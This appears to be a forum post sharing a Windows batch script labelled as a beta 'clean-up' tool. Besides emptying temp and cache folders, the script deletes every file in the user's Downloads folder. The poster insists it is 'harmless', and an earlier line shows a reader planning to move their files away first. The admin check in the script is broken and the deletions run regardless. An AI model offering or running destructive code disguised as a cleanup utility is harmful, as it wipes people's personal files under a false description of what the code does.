i guess ill try it after i move the 14GB of anime i have in my downloads folder
EDIT:
@echo off
color 01
echo ******************Soldier********************
echo *****************Version 0.1*****************
echo Please note: This is an extremely early beta.
echo Press any key to start a small clean-up of every user in this PC.
pause
if %username% == Administrator.WINDOWS goto admintrue
:admintrue
del "C:\temp\*.*"
del "C:\tmp\*.*"
del "C:\.jagex_cache_32\*.*"
del "C:\Users\%username%\Downloads\*.*"
echo Completed.
echo The window will now close.
pause
harmless, you guys are stupid